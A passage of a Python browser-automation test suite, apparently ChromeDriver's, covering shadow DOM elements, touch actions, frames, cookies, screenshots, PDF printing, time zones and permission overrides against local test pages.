def testShadowDomSendKeys(self):
"""Checks that chromedriver can call SendKeys on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#textBox"])
elem.SendKeys("bar")
self.assertEqual("foobar", self._driver.ExecuteScript(
'return arguments[0].value;', elem))
def testShadowDomClear(self):
"""Checks that chromedriver can call Clear on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#textBox"])
elem.Clear()
self.assertEqual("", self._driver.ExecuteScript(
'return arguments[0].value;', elem))
def testShadowDomClick(self):
"""Checks that chromedriver can call Click on an element in a shadow DOM."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# Wait for page to stabilize. See https://crbug.com/954553#c7
time.sleep(1)
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#button"])
elem.Click()
# the button's onClicked handler changes the text box's value
self.assertEqual("Button Was Clicked", self._driver.ExecuteScript(
'return arguments[0].value;',
self._FindElementInShadowDom(["#innerDiv", "#parentDiv", "#textBox"])))
def testShadowDomActionClick(self):
'''Checks that ChromeDriver can use actions API to click on an element in a
shadow DOM.'''
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# Wait for page to stabilize. See https://crbug.com/954553#c7
time.sleep(1)
elem = self._FindElementInShadowDom(
['#innerDiv', '#parentDiv', '#button'])
actions = ({'actions': [{
'type': 'pointer',
'actions': [{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0}],
'id': 'pointer1'}]})
self._driver.PerformActions(actions)
# the button's onClicked handler changes the text box's value
self.assertEqual('Button Was Clicked', self._driver.ExecuteScript(
'return arguments[0].value;',
self._FindElementInShadowDom(['#innerDiv', '#parentDiv', '#textBox'])))
def testShadowDomStaleReference(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#button"])
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").innerHTML="<div/>";')
with self.assertRaises(chromedriver.StaleElementReference):
elem.Click()
def testTouchDownMoveUpElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
location = target.GetLocation()
self._driver.TouchDown(location['x'], location['y'])
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart', events.GetText())
self._driver.TouchMove(location['x'] + 1, location['y'] + 1)
self.assertEquals('events: touchstart touchmove', events.GetText())
self._driver.TouchUp(location['x'] + 1, location['y'] + 1)
self.assertEquals('events: touchstart touchmove touchend', events.GetText())
def testGetElementRect(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/absolute_position_element.html'))
target = self._driver.FindElement('css selector', '#target')
rect = target.GetRect()
self.assertEquals(18, rect['x'])
self.assertEquals(10, rect['y'])
self.assertEquals(200, rect['height'])
self.assertEquals(210, rect['width'])
def testTouchFlickElement(self):
dx = 3
dy = 4
speed = 5
flickTouchEventsPerSecond = 30
moveEvents = int(
math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML = "preMove0";'
'});'
'div.addEventListener("touchmove", function() {'
' res = div.innerHTML.match(/preMove(\d+)/);'
' if (res != null) {'
' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);'
' }'
'});'
'div.addEventListener("touchend", function() {'
' if (div.innerHTML == "preMove' + str(moveEvents) + '") {'
' div.innerHTML = "new<br>";'
' }'
'});'
'return div;')
self._driver.TouchFlick(div, dx, dy, speed)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSwitchesToTopFrameAfterNavigation(self):
self._driver.Load('about:blank')
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
p = self._driver.FindElement('tag name', 'p')
self.assertEquals('Two', p.GetText())
def testSwitchesToTopFrameAfterRefresh(self):
self._driver.Load('about:blank')
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self._driver.Refresh()
p = self._driver.FindElement('tag name', 'p')
self.assertEquals('Two', p.GetText())
def testSwitchesToTopFrameAfterGoingBack(self):
self._driver.Load('about:blank')
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/inner.html'))
self._driver.GoBack()
p = self._driver.FindElement('tag name', 'p')
self.assertEquals('Two', p.GetText())
def testCanSwitchToPrintPreviewDialog(self):
old_handles = self._driver.GetWindowHandles()
print("Test debug: actual len of old_handles: " + str(len(old_handles)),
file = sys.stdout)
self.assertEquals(1, len(old_handles))
self._driver.ExecuteScript('setTimeout(function(){window.print();}, 0);')
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
if new_window_handle is None:
print("Test debug: new_window_handle is None", file = sys.stdout)
else:
print("Test debug: new_window_handle is not None", file = sys.stdout)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
print("Test debug: actual GetCurrentUrl: " + self._driver.GetCurrentUrl(),
file = sys.stdout)
self.assertEquals('chrome://print/', self._driver.GetCurrentUrl())
def testCanClickInIframes(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
a = self._driver.FindElement('tag name', 'a')
a.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#one'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
a = self._driver.FindElement('tag name', 'a')
a.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#two'))
def testDoesntHangOnFragmentNavigation(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html#x'))
def SetCookie(self, request):
return {'Set-Cookie': 'x=y; HttpOnly'}, "<!DOCTYPE html><html></html>"
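# Handler contract sketch (as used here and by _RequestHandler.handle below):
# a path callback returns a (response_headers_dict, response_body) pair that
# the test HTTP server serves for the registered path, e.g.:
#   self._http_server.SetCallbackForPath('/setCookie', self.SetCookie)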
def testGetHttpOnlyCookie(self):
self._http_server.SetCallbackForPath('/setCookie', self.SetCookie)
self._driver.Load(self.GetHttpUrlForFile('/setCookie'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
cookies = self._driver.GetCookies()
self.assertEquals(2, len(cookies))
for cookie in cookies:
self.assertIn('name', cookie)
if cookie['name'] == 'a':
self.assertFalse(cookie['httpOnly'])
elif cookie['name'] == 'x':
self.assertTrue(cookie['httpOnly'])
else:
self.fail('unexpected cookie: %s' % json.dumps(cookie))
def testCookiePath(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/long_url/empty.html'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
self._driver.AddCookie({
'name': 'x', 'value': 'y', 'path': '/chromedriver/long_url'})
cookies = self._driver.GetCookies()
self.assertEquals(2, len(cookies))
for cookie in cookies:
self.assertIn('path', cookie)
if cookie['name'] == 'a':
self.assertEquals('/' , cookie['path'])
if cookie['name'] == 'x':
self.assertEquals('/chromedriver/long_url' , cookie['path'])
def testGetNamedCookie(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
named_cookie = self._driver.GetNamedCookie('a')
self.assertEquals('a' , named_cookie['name'])
self.assertEquals('b' , named_cookie['value'])
self.assertRaisesRegexp(
chromedriver.NoSuchCookie, "no such cookie",
self._driver.GetNamedCookie, 'foo')
def testDeleteCookie(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
self._driver.AddCookie({'name': 'x', 'value': 'y'})
self._driver.AddCookie({'name': 'p', 'value': 'q'})
cookies = self._driver.GetCookies()
self.assertEquals(3, len(cookies))
self._driver.DeleteCookie('a')
self.assertEquals(2, len(self._driver.GetCookies()))
self._driver.DeleteAllCookies()
self.assertEquals(0, len(self._driver.GetCookies()))
def testCookieForFrame(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/cross_domain_iframe.html'))
self._driver.AddCookie({'name': 'outer', 'value': 'main context'})
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self.assertTrue(self.WaitForCondition(
lambda: 'outer.html' in
self._driver.ExecuteScript('return window.location.href')))
self._driver.AddCookie({'name': 'inner', 'value': 'frame context'})
cookies = self._driver.GetCookies()
self.assertEquals(1, len(cookies))
self.assertEquals('inner', cookies[0]['name'])
self._driver.SwitchToMainFrame()
cookies = self._driver.GetCookies()
self.assertEquals(1, len(cookies))
self.assertEquals('outer', cookies[0]['name'])
def testCanClickAlertInIframes(self):
# This test requires that the page be loaded from a file:// URI, rather than
# the test HTTP server.
path = os.path.join(chrome_paths.GetTestData(), 'chromedriver',
'page_with_frame.html')
url = 'file://' + six.moves.urllib.request.pathname2url(path)
self._driver.Load(url)
frame = self._driver.FindElement('css selector', '#frm')
self._driver.SwitchToFrame(frame)
a = self._driver.FindElement('css selector', '#btn')
a.Click()
self.WaitForCondition(lambda: self._driver.IsAlertOpen())
self._driver.HandleAlert(True)
def testThrowErrorWithExecuteScript(self):
self.assertRaisesRegexp(
chromedriver.JavaScriptError, "some error",
self._driver.ExecuteScript, 'throw new Error("some error")')
def testDoesntCrashWhenScriptLogsUndefinedValue(self):
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547
self._driver.ExecuteScript('var b; console.log(b);')
def testDoesntThrowWhenPageLogsUndefinedValue(self):
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/log_undefined_value.html'))
def testCanSetCheckboxWithSpaceKey(self):
self._driver.Load('about:blank')
self._driver.ExecuteScript(
"document.body.innerHTML = '<input type=\"checkbox\">';")
checkbox = self._driver.FindElement('tag name', 'input')
self.assertFalse(
self._driver.ExecuteScript('return arguments[0].checked', checkbox))
checkbox.SendKeys(' ')
self.assertTrue(
self._driver.ExecuteScript('return arguments[0].checked', checkbox))
def testElementReference(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/element_ref.html'))
element = self._driver.FindElement('css selector', '#link')
self._driver.FindElements('tag name', 'br')
w3c_id_length = 36
if (self._driver.w3c_compliant):
self.assertEquals(len(element._id), w3c_id_length)
def testFindElementWhenElementIsOverridden(self):
self._driver.Load('about:blank')
self._driver.ExecuteScript(
'document.body.appendChild(document.createElement("a"));')
self._driver.ExecuteScript('window.Element = {}')
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testExecuteScriptWhenObjectPrototypeIsModified(self):
# Some JavaScript libraries (e.g. MooTools) do things like this. For context
# see https://bugs.chromium.org/p/chromedriver/issues/detail?id=1521
self._driver.Load('about:blank')
self._driver.ExecuteScript('Object.prototype.$family = undefined;')
self.assertEquals(1, self._driver.ExecuteScript('return 1;'))
def testWebWorkerFrames(self):
"""Verify web worker frames are handled correctly.
Regression test for bug
https://bugs.chromium.org/p/chromedriver/issues/detail?id=2340.
The bug was triggered by opening a page with web worker, and then opening a
page on a different site. We simulate a different site by using 'localhost'
as the host name (default is '127.0.0.1').
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/web_worker.html'))
self._driver.Load(self._http_server.GetUrl('localhost')
+ '/chromedriver/empty.html')
def testWaitForCurrentFrameToLoad(self):
"""Verify ChromeDriver waits for loading events of current frame
Regression test for bug
https://bugs.chromium.org/p/chromedriver/issues/detail?id=3164
Clicking an element in the frame triggers a reload of that frame; the click
should not return until loading is complete.
"""
def waitAndRespond():
# The test may not detect the regression without a small sleep.
# Locally, a 0.2 s sleep did not fail before the code change, but 0.3 s did.
time.sleep(.5)
self._sync_server.RespondWithContent(
"""
<html>
<body>
<p id='valueToRead'>11</p>
</body>
</html>
""")
self._http_server.SetDataForPath('/page10.html',
"""
<html>
<head>
<title>
Frame
</title>
<script>
function reloadWith(i) {
window.location.assign('%s');
}
</script>
</head>
<body>
<button id='prev' onclick="reloadWith(9)">-1</button>
<button id='next' onclick="reloadWith(11)">+1</button>
<p id='valueToRead'>10</p>
</body>
</html>
""" % self._sync_server.GetUrl())
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_for_next_iframe.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame);
thread = threading.Thread(target=waitAndRespond)
thread.start()
self._driver.FindElement('css selector', '#next').Click()
value_display = self._driver.FindElement('css selector', '#valueToRead')
self.assertEquals('11', value_display.GetText())
def testSlowIFrame(self):
"""Verify ChromeDriver does not wait for slow frames to load.
Regression test for bugs
https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 and
https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350.
"""
def waitAndRespond():
# Send iframe contents slowly
time.sleep(2)
self._sync_server.RespondWithContent(
'<html><div id=iframediv>IFrame contents</div></html>')
self._http_server.SetDataForPath('/top.html',
"""
<html><body>
<div id='top'>
<input id='button' type="button" onclick="run()" value='Click'>
</div>
<script>
function run() {
var iframe = document.createElement('iframe');
iframe.id = 'iframe';
iframe.setAttribute('src', '%s');
document.body.appendChild(iframe);
}
</script>
</body></html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/top.html')
thread = threading.Thread(target=waitAndRespond)
thread.start()
start = monotonic()
# Click should not wait for frame to load, so elapsed time from this
# command should be < 2 seconds.
self._driver.FindElement('css selector', '#button').Click()
self.assertLess(monotonic() - start, 2.0)
frame = self._driver.FindElement('css selector', '#iframe')
# WaitForPendingNavigations examines the load state of the current frame,
# so ChromeDriver will wait for the frame to load after SwitchToFrame.
# start is reused because it marks when the frame began loading.
self._driver.SwitchToFrame(frame)
self.assertGreaterEqual(monotonic() - start, 2.0)
self._driver.FindElement('css selector', '#iframediv')
thread.join()
@staticmethod
def MakeRedImageTestScript(png_data_in_base64):
"""Used by the takeElementScreenshot* tests to load the PNG image via a data
URI, analyze it, and PASS/FAIL depending on whether all the pixels are
rgb(255,0,0)."""
return (
"""
const resolve = arguments[arguments.length - 1];
const image = new Image();
image.onload = () => {
var canvas = document.createElement('canvas');
canvas.width = image.width;
canvas.height = image.height;
var context = canvas.getContext('2d');
context.drawImage(image, 0, 0);
const pixels =
context.getImageData(0, 0, image.width, image.height).data;
for (let i = 0; i < pixels.length; i += 4) {
if (pixels[i + 0] != 255 || // Red
pixels[i + 1] != 0 || // Green
pixels[i + 2] != 0) { // Blue
const message = (
'FAIL: Bad pixel rgb(' + pixels.slice(i, i + 3).join(',') +
') at offset ' + i + ' from ' + image.src);
// "Disabled" on Mac 10.10: 1/15 test runs produces an incorrect
// pixel. Since no later Mac version, nor any other platform,
// exhibits this problem, we assume this is due to a bug in this
// specific version of Mac OS. So, just log the error and pass
// the test. http://crbug.com/913603
if (navigator.userAgent.indexOf('Mac OS X 10_10') != -1) {
console.error(message);
console.error('Passing test due to Mac 10.10-specific bug.');
resolve('PASS');
} else {
resolve(message);
}
return;
}
}
resolve('PASS');
};
image.src = 'data:image/png;base64,%s';
""" % png_data_in_base64.replace("'", "\\'"))
def takeScreenshotAndVerifyCorrect(self, element):
""" Takes screenshot of given element and returns
'PASS' if all pixels in screenshot are rgb(255, 0, 0)
and 'FAIL' otherwise
"""
elementScreenshotPNGBase64 = element.TakeElementScreenshot()
self.assertIsNotNone(elementScreenshotPNGBase64)
return self._driver.ExecuteAsyncScript(
ChromeDriverTest.MakeRedImageTestScript(elementScreenshotPNGBase64))
def testTakeElementScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_with_redbox.html'))
# Wait for page to stabilize in case of Chrome showing top bars.
# See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#box')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
def testTakeElementScreenshotPartlyVisible(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_with_redbox_partly_visible.html'))
self._driver.SetWindowRect(500, 500, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#box')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
def testTakeElementScreenshotInIframe(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_with_iframe_redbox.html'))
frame = self._driver.FindElement('css selector', '#frm')
self._driver.SwitchToFrame(frame)
# Wait for page to stabilize in case of Chrome showing top bars.
# See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#box')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
def testTakeLargeElementScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/large_element.html'))
self._driver.SetWindowRect(500, 500, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#A')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
@staticmethod
def png_dimensions(png_data_in_base64):
image = base64.b64decode(png_data_in_base64)
width, height = struct.unpack('>LL', image[16:24])
return int(width), int(height)
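# Background for the slice above (illustrative): a PNG file starts with an
# 8-byte signature followed by the IHDR chunk (4-byte length, 4-byte type),
# so the big-endian 32-bit width and height live at byte offsets 16-23.
# For example, a 640x400 image yields:
#   >>> struct.unpack('>LL', b'\x00\x00\x02\x80\x00\x00\x01\x90')
#   (640, 400)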
def testTakeLargeElementViewportScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/large_element.html'))
self._driver.SetWindowRect(640, 400, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
viewportScreenshotPNGBase64 = self._driver.TakeScreenshot()
self.assertIsNotNone(viewportScreenshotPNGBase64)
mime_type = imghdr.what('', base64.b64decode(viewportScreenshotPNGBase64))
self.assertEqual('png', mime_type)
image_width, image_height = self.png_dimensions(viewportScreenshotPNGBase64)
viewport_width, viewport_height = self._driver.ExecuteScript(
'''
const {devicePixelRatio, innerHeight, innerWidth} = window;
return [
Math.floor(innerWidth * devicePixelRatio),
Math.floor(innerHeight * devicePixelRatio)
];
''')
self.assertEquals(image_width, viewport_width)
self.assertEquals(image_height, viewport_height)
def testTakeLargeElementFullPageScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/large_element.html'))
width = 640
height = 400
self._driver.SetWindowRect(width, height, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
fullpageScreenshotPNGBase64 = self._driver.TakeFullPageScreenshot()
self.assertIsNotNone(fullpageScreenshotPNGBase64)
mime_type = imghdr.what('', base64.b64decode(fullpageScreenshotPNGBase64))
self.assertEqual('png', mime_type)
image_width, image_height = self.png_dimensions(fullpageScreenshotPNGBase64)
# According to https://javascript.info/size-and-scroll-window, this is the
# width/height of the whole document, including the scrolled-out part.
page_width, page_height = self._driver.ExecuteScript(
'''
const body = document.body;
const doc = document.documentElement;
const width = Math.max(body.scrollWidth, body.offsetWidth,\
body.clientWidth, doc.scrollWidth,\
doc.offsetWidth, doc.clientWidth);
const height = Math.max(body.scrollHeight, body.offsetHeight,\
body.clientHeight, doc.scrollHeight,\
doc.offsetHeight, doc.clientHeight);
return [
width,
height
];
''')
self.assertEquals(image_width, page_width)
self.assertEquals(image_height, page_height)
# Assert the window rect size stays the same after taking the full-page
# screenshot.
size = self._driver.GetWindowRect()
self.assertEquals(size[0], width)
self.assertEquals(size[1], height)
# Verify that scroll bars are still present after the test.
horizontal_scroll_bar, vertical_scroll_bar = self._driver.ExecuteScript(
'''
const doc = document.documentElement;
return [
doc.scrollWidth > doc.clientWidth,
doc.scrollHeight > doc.clientHeight
];
''')
self.assertEquals(horizontal_scroll_bar, True)
self.assertEquals(vertical_scroll_bar, True)
def testPrint(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
pdf = self._driver.PrintPDF({
'orientation': 'landscape',
'scale': 1.1,
'margin': {
'top': 1.1,
'bottom': 2.2,
'left': 3.3,
'right': 4.4
},
'background': True,
'shrinkToFit': False,
'pageRanges': [1],
'page': {
'width': 15.6,
'height': 20.6
}
})
decoded_pdf = base64.b64decode(pdf)
self.assertTrue(decoded_pdf.startswith("%PDF"))
self.assertTrue(decoded_pdf.endswith("%%EOF"))
def testPrintInvalidArgument(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self.assertRaises(chromedriver.InvalidArgument,
self._driver.PrintPDF, {'pageRanges': ['x-y']})
def testGenerateTestReport(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/reporting_observer.html'))
self._driver.GenerateTestReport('test report message');
report = self._driver.ExecuteScript('return window.result;')
self.assertEquals('test', report['type']);
self.assertEquals('test report message', report['body']['message']);
def testSetTimeZone(self):
defaultTimeZoneScript = '''
return (new Intl.DateTimeFormat()).resolvedOptions().timeZone;
''';
localHourScript = '''
return (new Date("2020-10-10T00:00:00Z")).getHours();
''';
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
# Test to switch to Taipei
self._driver.SetTimeZone('Asia/Taipei');
timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
self.assertEquals('Asia/Taipei', timeZone);
localHour = self._driver.ExecuteScript(localHourScript)
# Taipei time is GMT+8 and does not observe DST.
self.assertEquals(8, localHour);
# Test to switch to Tokyo
self._driver.SetTimeZone('Asia/Tokyo');
timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
self.assertEquals('Asia/Tokyo', timeZone);
localHour = self._driver.ExecuteScript(localHourScript)
# Tokyo time is GMT+9 and does not observe DST.
self.assertEquals(9, localHour);
def GetPermissionWithQuery(self, query):
script = """
let query = arguments[0];
let done = arguments[1];
console.log(done);
navigator.permissions.query(query)
.then(function(value) {
done({ status: 'success', value: value && value.state });
}, function(error) {
done({ status: 'error', value: error && error.message });
});
"""
return self._driver.ExecuteAsyncScript(script, query)
def GetPermission(self, name):
return self.GetPermissionWithQuery({ 'name': name })
def CheckPermission(self, response, expected_state):
self.assertEquals(response['status'], 'success')
self.assertEquals(response['value'], expected_state)
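# Usage sketch for the three helpers above (mirrors the tests below):
#   self._driver.SetPermission(
#       {'descriptor': {'name': 'geolocation'}, 'state': 'granted'})
#   self.CheckPermission(self.GetPermission('geolocation'), 'granted')
# Descriptors with extra fields go through GetPermissionWithQuery, e.g.
# {'name': 'midi', 'sysex': True}.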
def testPermissionsOpaqueOriginsThrowError(self):
""" Confirms that opaque origins cannot have overrides. """
self._driver.Load("about:blank")
self.assertRaises(chromedriver.InvalidArgument,
self._driver.SetPermission, {'descriptor': { 'name': 'geolocation' },
'state': 'denied'})
def testPermissionStates(self):
""" Confirms that denied, granted, and prompt can be set. """
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'denied'
})
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'granted'
})
self.CheckPermission(self.GetPermission('geolocation'), 'granted')
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'prompt'
})
self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
def testSettingPermissionDoesNotAffectOthers(self):
""" Confirm permissions do not affect unset permissions. """
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
response = self.GetPermission('geolocation')
self.assertEquals(response['status'], 'success')
status = response['value']
self._driver.SetPermission({
'descriptor': { 'name': 'background-sync' },
'state': 'denied'
})
self.CheckPermission(self.GetPermission('background-sync'), 'denied')
self.CheckPermission(self.GetPermission('geolocation'), status)
def testMultiplePermissions(self):
""" Confirms multiple custom permissions can be set simultaneously. """
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'denied'
})
self._driver.SetPermission({
'descriptor': { 'name': 'background-fetch' },
'state': 'prompt'
})
self._driver.SetPermission({
'descriptor': { 'name': 'background-sync' },
'state': 'granted'
})
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
self.CheckPermission(self.GetPermission('background-fetch'), 'prompt')
self.CheckPermission(self.GetPermission('background-sync'), 'granted')
def testSensorPermissions(self):
""" Tests sensor permissions.
Currently, Chrome controls all sensor permissions (accelerometer,
magnetometer, gyroscope, ambient-light-sensor) with the 'sensors'
permission. This test demonstrates this internal implementation detail so
developers are aware of this behavior.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'magnetometer' },
'state': 'granted'
}
self._driver.SetPermission(parameters)
# Light sensor is not enabled by default, so it cannot be queried or set.
#self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'granted')
self.CheckPermission(self.GetPermission('magnetometer'), 'granted')
self.CheckPermission(self.GetPermission('accelerometer'), 'granted')
self.CheckPermission(self.GetPermission('gyroscope'), 'granted')
parameters = {
'descriptor': { 'name': 'gyroscope' },
'state': 'denied'
}
self._driver.SetPermission(parameters)
#self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'denied')
self.CheckPermission(self.GetPermission('magnetometer'), 'denied')
self.CheckPermission(self.GetPermission('accelerometer'), 'denied')
self.CheckPermission(self.GetPermission('gyroscope'), 'denied')
def testMidiPermissions(self):
""" Tests midi permission requirements.
Granting MIDI with sysex: true should automatically grant regular MIDI
permissions.
Denying regular MIDI should also imply that MIDI with sysex is
denied.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'midi', 'sysex': True },
'state': 'granted'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters['descriptor']['sysex'] = False
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters = {
'descriptor': { 'name': 'midi', 'sysex': False },
'state': 'denied'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'denied')
# Querying with parameters['descriptor']['sysex'] = True should now be
# denied, but Chrome does not currently do this, so it is not checked here.
def testClipboardPermissions(self):
""" Tests clipboard permission requirements.
clipboard-read with allowWithoutSanitization: true or false, and
clipboard-write with allowWithoutSanitization: true are bundled together
into one CLIPBOARD_READ_WRITE permission.
clipboard-write with allowWithoutSanitization: false is an auto-granted
permission.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': {
'name': 'clipboard-read' ,
'allowWithoutSanitization': False
},
'state': 'granted'
}
raw_write_parameters = {
'descriptor': {
'name': 'clipboard-write',
'allowWithoutSanitization': True
}
}
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'prompt')
self.CheckPermission(self.GetPermissionWithQuery(
raw_write_parameters['descriptor']), 'prompt')
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters['descriptor']['allowWithoutSanitization'] = True
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters['descriptor']['name'] = 'clipboard-write'
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters = {
'descriptor': { 'name': 'clipboard-write' },
'state': 'prompt'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('clipboard-read'), 'granted')
self.CheckPermission(self.GetPermission('clipboard-write'), 'prompt')
def testPersistentStoragePermissions(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'persistent-storage' },
'state': 'granted'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('persistent-storage'), 'granted')
parameters['state'] = 'denied'
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('persistent-storage'), 'denied')
def testPushAndNotificationsPermissions(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'notifications' },
'state': 'granted'
}
push_descriptor = {
'name': 'push',
'userVisibleOnly': True
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('notifications'), 'granted')
self.CheckPermission(self.GetPermissionWithQuery(push_descriptor),
'granted')
parameters['state'] = 'denied'
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('notifications'), 'denied')
self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'denied')
push_descriptor['userVisibleOnly'] = False
parameters = {
'descriptor': push_descriptor,
